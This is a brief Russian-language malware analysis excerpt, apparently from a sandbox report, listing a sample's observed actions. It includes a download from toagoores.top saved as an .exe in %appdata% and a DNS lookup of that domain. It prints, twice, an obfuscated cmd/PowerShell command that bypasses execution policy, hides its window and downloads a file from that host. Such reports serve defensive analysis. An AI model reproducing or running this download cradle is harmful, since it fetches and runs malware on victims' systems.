Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Pow^E^RSHelL.^exe^ ^-e^xe^CUtIONpoL^Ic^y BYp^asS^ ^-no^PRoFI^LE ^-^w^I^NdoW^Sty^lE Hid^den^ (NE^w-^Obje^ct ^s^YsTEM^.^Ne^T.W^eBc^LIE^nT)^.DOwn^LOA^DFi^l^e('http://toagoores.top/...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /c "Pow^E^RSHelL.^exe^ ^-e^xe^CUtIONpoL^Ic^y BYp^asS^ ^-no^PRoFI^LE ^-^w^I^NdoW^Sty^lE Hid^den^ (NE^w-^Obje^ct ^s^YsTEM^.^Ne^T.W^eBc^LIE^nT)^.DOwn^LOA^DFi^l^e('http://toagoores.top/...' (со скрытым окном)